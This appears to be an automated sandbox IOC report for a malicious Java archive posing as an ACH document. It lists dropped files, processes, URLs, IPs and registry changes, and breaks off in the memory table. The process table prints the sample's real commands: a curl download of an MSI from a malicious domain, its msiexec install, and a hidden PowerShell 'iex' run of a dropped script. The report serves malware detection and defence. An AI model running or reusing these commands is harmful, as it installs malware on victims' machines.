IOC Report
23-April-24-ACH-7fa67756.jar

loading gif

Files

File Path
Type
Category
Malicious
23-April-24-ACH-7fa67756.jar
Java archive data (JAR)
initial sample
malicious
C:\ProgramData\lgp\sjm
ASCII text
dropped
malicious
C:\Config.Msi\46f336.rbs
data
modified
C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2sljm0c.nhc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp3c1nj5.x2f.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\hsperfdata_user\6152
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\YBK27W652F4IJAVOUCH5.temp
data
dropped
C:\Windows\Installer\46f335.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
dropped
C:\Windows\Installer\46f337.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
dropped
C:\Windows\Installer\MSIF45E.tmp
data
dropped
C:\Windows\Installer\SourceHash{5388A5D6-8B37-4242-B64C-4D72F236B407}
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Installer\inprogressinstallinfo.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Temp\~DF038DB82E145104A8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF165C3EF9705925E4.TMP
data
dropped
C:\Windows\Temp\~DF2B96C09185FA214E.TMP
data
dropped
C:\Windows\Temp\~DF32A04107112E9A4B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF3D7219F5911854F7.TMP
data
dropped
C:\Windows\Temp\~DF5EE5930C625E6338.TMP
data
dropped
C:\Windows\Temp\~DF86EB1E75F831F209.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF89B53ECD342FBFE9.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF8C64761B64534E51.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB7E94AAC73192A94.TMP
data
dropped
C:\Windows\Temp\~DFE10EA429A44556AB.TMP
data
dropped
C:\Windows\Temp\~DFE1FFE766D8E9718D.TMP
data
dropped
C:\downloads\aHPCrYM1.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: This setup package will Install MSD Setup version 3.5.0, Author: MSD Setup, Keywords: Installer, Comments: This installer database contains the logic and data required to install MSD Setup., Template: Intel;1033, Revision Number: {D59C64C0-985A-437E-9F88-C578DBDDC731}, Create Time/Date: Tue Apr 23 10:56:26 2024, Last Saved Time/Date: Tue Apr 23 10:56:26 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1528), Security: 2
dropped
There are 19 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"" >> C:\cmdlinestart.log 2>&1
malicious
C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\23-April-24-ACH-7fa67756.jar"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\downloads\aHPCrYM1.msi
malicious
C:\Windows\System32\cmd.exe
"cmd" /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden "iex (gc ('C:\ProgramData\lgp\sjm') | out-string)"
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\PING.EXE
"C:\Windows\system32\PING.EXE" 1.1.1.1
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\curl.exe
curl.exe --output C:\downloads\aHPCrYM1.msi --url https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\downloads\aHPCrYM1.msi"
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 30 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://64.95.10.191/
unknown
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC
unknown
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiS
unknown
http://java.oracle.com/
unknown
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiC:
unknown
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msicurl.exe
unknown
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msi
172.67.168.231
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiXq
unknown
http://bugreport.sun.com/bugreport/k
unknown
https://cryptonews.direct/wp-content/themes/twentytwentytwo/MSD_Setup_sib.msiWinSta0
unknown
http://bugreport.sun.com/bugreport/
unknown
http://64.95.10.191/2220045058
64.95.10.191
There are 2 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cryptonews.direct
172.67.168.231

IPs

IP
Domain
Country
Malicious
172.67.168.231
cryptonews.direct
United States
64.95.10.191
unknown
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{8D80504A-0826-40C5-97E1-EBC68F953792} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\msiexec.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\msiexec.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Config.Msi\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\46f336.rbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
C:\Config.Msi\46f336.rbsLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\Users\user\AppData\Roaming\Microsoft\Installer\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D4270833EE88
6D5A883573B824246BC4D4272F634B70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D4275F1102A2
6D5A883573B824246BC4D4272F634B70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D42754FA10A1
6D5A883573B824246BC4D4272F634B70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D42788505742
6D5A883573B824246BC4D4272F634B70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Components\6D5A883573B824246BC4D427536B41A7
6D5A883573B824246BC4D4272F634B70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
C:\ProgramData\lgp\
HKEY_CURRENT_USER\SOFTWARE\WixSharp\Used
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
LocalPackage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
Language
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
AuthorizedCDFPrefix
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
Comments
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
Contact
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
HelpLink
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
HelpTelephone
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
InstallSource
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
ModifyPath
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
Publisher
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
Readme
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
Size
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
EstimatedSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
URLInfoAbout
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
URLUpdateInfo
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
WindowsInstaller
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\EA0EEFD4EB804094F8151EB6BB8A66A6
6D5A883573B824246BC4D4272F634B70
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\InstallProperties
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5388A5D6-8B37-4242-B64C-4D72F236B407}
DisplayName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Features\6D5A883573B824246BC4D4272F634B70
MSD_Setup_
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\Features
MSD_Setup_
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2246122658-3693405117-2476756634-1003\Products\6D5A883573B824246BC4D4272F634B70\Patches
AllPatches
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
ProductName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
PackageCode
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
Language
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
Assignment
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
AdvertiseFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
InstanceType
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
AuthorizedLUAApp
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
DeploymentFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\UpgradeCodes\EA0EEFD4EB804094F8151EB6BB8A66A6
6D5A883573B824246BC4D4272F634B70
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList
PackageName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList\Net
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList\Media
1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70
Clients
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Installer\Products\6D5A883573B824246BC4D4272F634B70\SourceList
LastUsedSource
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\ci.dll,-100
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\ci.dll,-101
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\fveui.dll,-843
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\fveui.dll,-844
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\System32\wuaueng.dll,-400
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
@%SystemRoot%\system32\NgcRecovery.dll,-100
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 96 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
16F6D2A0000
heap
page read and write
229135A9000
heap
page read and write
45F9000
trusted library allocation
page read and write
20C097F0000
heap
page read and write
2CA5000
heap
page read and write
4638000
trusted library allocation
page read and write
A00000
heap
page read and write
22443B57000
heap
page read and write
E9C0EFE000
stack
page read and write
1493D000
stack
page read and write
16ED4970000
heap
page read and write
1F4A84E0000
heap
page read and write
4238000
trusted library allocation
page read and write
147DD000
stack
page read and write
990000
heap
page read and write
229135B7000
heap
page read and write
66DA3FE000
stack
page read and write
14D6D000
heap
page read and write
4215000
trusted library allocation
page read and write
45F3000
trusted library allocation
page read and write
42E4000
trusted library allocation
page read and write
4232000
trusted library allocation
page read and write
9B0000
heap
page read and write
4CC8C7E000
stack
page read and write
45F0000
trusted library allocation
page read and write
19B6E4C9000
heap
page read and write
12922450000
heap
page read and write
22443E05000
heap
page read and write
2111F27E000
heap
page read and write
14C54000
heap
page read and write
272D2D3F000
heap
page read and write
22443B10000
heap
page read and write
2203000
trusted library allocation
page execute and read and write
249D1040000
heap
page read and write
14D0F000
heap
page read and write
CBADBFE000
stack
page read and write
5757FFE000
stack
page read and write
55DD77F000
stack
page read and write
1292248F000
heap
page read and write
2C60000
heap
page read and write
1279D1D0000
heap
page read and write
2107DC60000
heap
page read and write
14D6D000
heap
page read and write
213D5F000
unkown
page read and write
ED2767F000
unkown
page read and write
22913885000
heap
page read and write
2951E7DD000
heap
page read and write
1279D0D0000
heap
page read and write
26CC4E10000
heap
page read and write
7DF5EFE000
stack
page read and write
12922400000
heap
page read and write
16ED4A7F000
heap
page read and write
42D3000
